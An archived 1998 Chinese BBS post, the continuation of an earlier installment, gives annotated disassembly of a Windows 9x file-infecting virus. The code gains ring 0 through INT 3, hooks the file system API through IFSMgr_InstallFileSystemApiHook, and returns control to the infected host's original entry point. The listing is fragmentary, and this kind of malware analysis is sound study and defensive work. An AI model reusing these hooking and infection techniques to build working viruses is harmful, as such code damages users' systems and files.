发信人: crazydiamond()
整理人: jia(1998-10-26 01:23:58), 站内信件
|
接上回: :0000004A pop esi :0000004B int 03 ;第二次进入ring0,截获IFS_APIHOOK ......
:00000063 je 00000097 ;判断是否第二次调用? 是则跳转 ...... :00000097 lea eax, dword ptr [edi+FFFFFCF7] :0000009D push eax :0000009E vxdcall IFSMgr_InstallFileSystemApiHook ;加入IFS_ApiHook 指向000000e2
:000000A4 mov dr0,eax ;保存旧的ApiHook :000000A7 pop eax :000000A8 mov ecx, dword ptr [esi+3D] :000000AB mov edx, dword ptr [ecx] :000000AD mov dword ptr [eax-04], edx :000000B0 lea eax, dword ptr [eax-2A] :000000B3 mov dword ptr [ecx], eax ;修改IFSMgr_InstallFileSystemApiHook函数入口指向000000b8 :000000B5 cli :000000B6 jmp 0000006E ......
:0000006E mov word ptr [ebx-04], bp :00000072 shr ebp, 10 :00000075 mov word ptr [ebx+02], bp ;恢复原来的Int3 返回0000004c :00000079 iret ......
:0000004C sti :0000004D xor ebx, ebx :0000004F jmp 00000058 :00000051 xor ebx, ebx :00000053 mov eax, dword ptr fs:[ebx] :00000056 mov esp, dword ptr [eax] :00000058 pop dword ptr fs:[ebx] :0000005B pop eax :0000005C pop ebp :0000005D push 01002210 ;宿主程序原起始地址,因被感染程序而异 :00000062 ret ;返回控制
自此,病毒接管系统。
-- ............
※ 来源:.广州网易 BBS bbs.nease.net.[FROM: 202.96.101.254]
|
|